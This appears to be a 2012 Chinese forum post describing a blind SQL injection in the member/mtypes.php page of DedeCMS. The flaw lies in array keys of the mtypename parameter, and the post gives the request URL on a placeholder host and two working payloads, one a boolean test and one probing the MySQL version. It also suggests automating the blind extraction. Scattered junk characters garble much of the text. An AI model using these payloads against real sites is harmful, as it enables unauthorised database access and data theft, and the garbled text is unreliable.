需要magic_quotes_gpc = Off,所以说是鸡肋啊., Y7 Q2 v- e3 C8 i- m
, H' Z" O1 T1 M) N, B
6 z: j: g F! L- T9 u/ B) z$ f; p$ W
发生在数组key里的注射漏洞,有点意思.: \6 x l9 g. i
7 n- z2 C H- W0 M4 _, E" v5 }这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下2 x1 n- z8 \! D; O, m) m
, V! v4 Y2 s- ?7 X t3 d
http://www.xxx.com /dede/member/mtypes.php?dopost=save% S! [1 I: D; i) N1 {6 e- @
8 r' h# r( K4 B* y
exploit:
% O, H4 w' u% U v6 c" H7 vmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r Q; \' i6 H# ?, o+ H
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r" ~9 L: ~$ a" P' ^
|
发表于 2012-12-20 08:08:09
收藏
支持
反对